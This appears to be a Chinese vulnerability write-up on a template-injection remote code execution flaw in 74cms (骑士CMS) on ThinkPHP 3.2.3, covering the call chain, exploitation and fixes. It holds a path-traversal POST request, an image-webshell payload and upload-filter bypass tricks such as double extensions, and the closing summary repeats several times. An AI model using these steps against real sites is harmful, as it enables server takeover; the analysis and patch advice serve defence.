骑士CMS远程命令执行漏洞分析与利用教学<\/h1>

0x00 漏洞概述<\/h2>
骑士CMS（74cms）在`\/Application\/Common\/Controller\/BaseController.class.php<\/code>文件的assign_resume_tpl<\/code>函数中存在模板注入漏洞，导致远程命令执行。该漏洞源于过滤不严格，攻击者可通过构造恶意请求实现任意代码执行。<\/p>`

0x01 环境背景<\/h2>
骑士CMS架构特点<\/h3>

基于ThinkPHP 3.2.3框架<\/li>
采用普通模式URL结构：http:\/\/serverName\/?m=模块&c=控制器&a=操作&var=value<\/code>

m<\/code>参数表示模块<\/li>
c<\/code>参数表示控制器<\/li>
a<\/code>参数表示操作\/方法<\/li>
<\/ul>
<\/li>
可通过系统配置修改参数名称：
'VAR_MODULE'<\/span> =><\/span> 'module'<\/span>,     \/\/ 默认模块获取变量
<\/span><\/span><\/span><\/span>'VAR_CONTROLLER'<\/span> =><\/span> 'controller'<\/span>,    \/\/ 默认控制器获取变量
<\/span><\/span><\/span><\/span>'VAR_ACTION'<\/span> =><\/span> 'action'<\/span>,    \/\/ 默认操作获取变量
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
0x02 漏洞分析<\/h2>
漏洞位置<\/h3>
\/Application\/Common\/Controller\/BaseController.class.php<\/code>中的assign_resume_tpl<\/code>方法：<\/p>
public<\/span> function<\/span> assign_resume_tpl<\/span>($variable,$tpl){
<\/span><\/span>    foreach<\/span> ($variable as<\/span> $key =><\/span> $value) {
<\/span><\/span>        $this-><\/span>assign<\/span>($key,$value);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $this-><\/span>fetch<\/span>($tpl);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞触发链<\/h3>

$tpl<\/code>变量直接传入fetch()<\/code>方法<\/li>
进入\/ThinkPHP\/Library\/Think\/View.class.php<\/code>的fetch()<\/code>方法<\/li>
判断模板引擎类型（默认使用Think模板引擎）<\/li>
触发view_parse<\/code>事件，执行ParseTemplateBehavior<\/code>行为<\/li>
调用Template<\/code>类的fetch()<\/code>和loadTemplate()<\/code>方法<\/li>
在loadTemplate()<\/code>中，$templateFile<\/code>被赋值给$tmplContent<\/code><\/li>
进入compiler()<\/code>方法编译模板内容<\/li>
最终通过Storage::load()<\/code>包含文件<\/li>
<\/ol>
关键点<\/h3>

模板内容未经充分过滤直接包含<\/li>
攻击者可控制$tpl<\/code>参数实现任意文件包含<\/li>
默认配置TMPL_DENY_PHP<\/code>为false，允许执行PHP代码<\/li>
<\/ul>
0x03 漏洞利用<\/h2>
利用条件<\/h3>

拥有普通用户权限（可上传文件）<\/li>
可访问assign_resume_tpl<\/code>方法<\/li>
<\/ol>
利用步骤<\/h3>


注册普通用户账号<\/strong><\/p>

访问网站前台注册页面完成注册<\/li>
<\/ul>
<\/li>

更新简历并上传图片马<\/strong><\/p>

进入简历管理页面<\/li>
上传包含恶意代码的图片文件（需绕过图片过滤）<\/li>
获取图片存储路径，如：\/data\/upload\/resume_img\/2011\/13\/5fae95e469e05.jpg<\/code><\/li>
<\/ul>
<\/li>

构造恶意请求<\/strong><\/p>
POST \/index.php?m=home&a=assign_resume_tpl HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded

variable=1&tpl=..\/..\/..\/..\/var\/www\/html\/data\/upload\/resume_img\/2011\/13\/5fae95e469e05.jpg
<\/code><\/pre>
<\/li>

图片马内容要求<\/strong><\/p>

必须包含骑士CMS模板标签<\/li>
示例内容：
<?<\/span>php<\/span> phpinfo<\/span>(); ?><\/span>
<\/span><\/span><\/span><qscms:company_show 列表名="info" 企业id="$_GET['id']"\/>
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
绕过技巧<\/h3>

尝试上传docx等其他类型文件<\/li>
修改文件头绕过图片检测<\/li>
使用双重扩展名（如test.jpg.php）<\/li>
<\/ul>
0x04 漏洞修复<\/h2>
官方修复（不完善）<\/h3>
在BaseController.class.php<\/code>中添加：<\/p>
$view =<\/span> new<\/span> \Think\View<\/span>;
<\/span><\/span>$tpl_file =<\/span> $view-><\/span>parseTemplate<\/span>($tpl);
<\/span><\/span>if<\/span>(!<\/span>is_file<\/span>($tpl_file)){
<\/span><\/span>    return<\/span> false<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>有效修复方案<\/h3>
在assign_resume_tpl<\/code>方法中添加严格过滤：<\/p>
$pattern =<\/span> "\.\\/|\.\.\\/|:|%00|%0a|=|~|@|file|php|filter|resource"<\/span>;
<\/span><\/span>if<\/span>(preg_match<\/span>("\/"<\/span>.<\/span>$pattern.<\/span>"\/is"<\/span>,$tpl)==<\/span> 1<\/span>){
<\/span><\/span>    return<\/span> $this-><\/span>_empty<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x05 防御建议<\/h2>

对所有用户输入进行严格过滤<\/li>
禁用危险函数和特殊字符<\/li>
限制文件上传类型<\/li>
设置TMPL_DENY_PHP<\/code>为true<\/li>
及时更新到最新版本<\/li>
<\/ol>
0x06 总结<\/h2>
该漏洞是典型的模板注入漏洞，通过可控参数传入fetch()<\/code>函数实现任意文件包含。利用需要普通用户权限，但危害严重。开发人员应重视所有用户输入的过滤，特别是涉及文件操作和模板渲染的部分。<\/p>

骑士CMS远程命令执行漏洞分析与利用教学<\/h1>

0x02 漏洞分析<\/h2>

0x03 漏洞利用<\/h2>

0x04 漏洞修复<\/h2>

0x06 总结<\/h2> 该漏洞是典型的模板注入漏洞，通过可控参数传入fetch()<\/code>函数实现任意文件包含。利用需要普通用户权限，但危害严重。开发人员应重视所有用户输入的过滤，特别是涉及文件操作和模板渲染的部分。<\/p>

0x06 总结<\/h2>
该漏洞是典型的模板注入漏洞，通过可控参数传入`fetch()<\/code>函数实现任意文件包含。利用需要普通用户权限，但危害严重。开发人员应重视所有用户输入的过滤，特别是涉及文件操作和模板渲染的部分。<\/p>`